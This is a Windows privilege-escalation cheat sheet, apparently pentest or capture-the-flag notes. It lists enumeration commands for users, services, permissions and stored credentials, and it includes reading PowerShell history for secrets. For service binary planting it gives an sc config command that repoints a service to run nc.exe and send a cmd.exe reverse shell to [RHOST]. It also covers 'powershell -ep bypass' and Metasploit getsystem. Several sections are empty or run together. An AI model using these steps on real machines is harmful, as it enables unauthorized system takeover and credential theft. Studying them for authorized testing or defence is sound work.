Windows Privilege Escalation
Enumeration
OS Info Enumeration
systeminfo
hostname
echo %username%
wmic qfe -> check patches
wmic logicaldisk -> get other disk information
User Enumeration
whoami
whoami /priv -> check user privilleges
whoami /groups -> check user groups
net user -> list all users
net user <username> -> check groups associated with a user
net localgroup -> Check all the local groups available
net localgroup <group name> -> List the members of the given localgroup
Task | Service | Process Enumeration
sc queryex type= service (Lists all the service)
tasklist /SVC
tasklist
net start
DRIVERQUERY
wmic product get name, version, vendor
Permission Enumeration
C:\Program Files : icacls program_name
icacls root.txt /grant <username>:F (to grant permission to access file)
Check the PowerShell history file
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Check stored usernames and passwords
cmdkey /list
Network based
ipconfig
ipconfig /all
arp -a
router print
netstat -ano
Password Hunting
AV / Firewall check / Service Enumeration
Scheduled Tasks
Mount Information
mountvol
Escalation Techniques
Service Account Priv Esc (Token Impersonation)
whoami /priv
Run As :
Use the cmdkey
to list the stored credentials on the machine.
Using runas
with a provided set of credential.
Access check :
accesschk.exe -ucqv [service_name] /accepteula
accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
Find all weak file permissions per drive.
accesschk.exe /accepteula -uwsv "Everyone" "C:\Program Files"
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
Powershell
:
Binary planting (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services)
sc qc [service_name] // for service properties
sc query [service_name] // for service status
sc config [service_name] binpath= "C:\Temp\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
sc config [service_name] obj= ".\LocalSystem" password= ""
net start [service_name]
Unquoted Service Path Privilege Escalation
PATH directories with weak permissions
Always Install Elevated :
Kernel Exploits :
run
systeminfo
| capture the output and run windows-exploit-suggester.pyCompiling Kernel Exploits :
or for 32 bit
Automated Enumeration Tools
Powershell:
powershell -ep bypass
load powershell (only in meterpreter)
Sherlock (https://github.com/rasta-mouse/Sherlock)
EXE : (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#exe)
Other : Windows Exploit Suggester (https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
Metasploit :
getsystem
run post/multi/recon/local_
exploit_
suggester
Resources :
https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation (Win PrivEsc Checlist)
Last updated